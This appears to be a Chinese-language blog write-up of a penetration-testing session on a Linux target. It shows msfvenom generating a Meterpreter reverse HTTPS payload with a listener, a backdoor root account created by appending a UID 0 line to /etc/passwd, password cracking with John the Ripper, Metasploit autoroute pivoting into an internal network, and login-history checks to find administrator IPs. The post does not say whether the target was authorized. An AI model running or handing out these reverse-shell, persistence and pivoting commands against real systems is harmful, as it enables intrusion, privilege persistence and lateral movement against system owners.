反弹shell

msfvenom -p linux/x86/meterpreter_reverse_https
LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

msf进行监听反弹meterpretershell

这里要说一下,反弹shell与payload有关如果要反弹meterpreter必须要用meterpreter的payload,用shell的payload只会返回一个cmdshell。自己之前也是没注意。。。而且用tcp的容易断

权限维持

echo "rool:x:0:0::/:/bin/sh" >> /etc/passwd
echo "rool:password" |chpasswd

还是比较简单,这里没有进行什么限制直接就添加上了。
本地做了socks5代理直接连下试试。发现没有成功,因为在之前的测试中添加普通账号登录成功过。

cat /etc/ssh/sshd_config

尝试hash John the Ripper爆密码(ps:没报啥希望。。。)

没字典也就是能爆个自己添加的弱口令。

root权限,直接添加账号然后切换用户就完事了。就是目标处于内网环境用代理连过去真的很慢。。。

添加路由

run get_local_subnets
run autoroute -s 10.5.0.0
run autoroute -p查询

因为是255.255.0.0 C类地址我就把有联系的都填上了。

root权限查看登录ip历史记录,找到目标

last -x

看到有两个网段192/10,root用户基本是10网路来的,锁定这几个ip。

路由也填上了,但是扫的时候就是有问题。也不知道怎么回事。

总结

这次渗透目标也不是很明确,主要是接着上次把我学到的一些知识运用一下,内网渗透很大我学的不过沧海一粟很多东西还没弄懂,信息收集也没成一套体系。好在还是有些进步,此站到一段落如果有后续再更吧。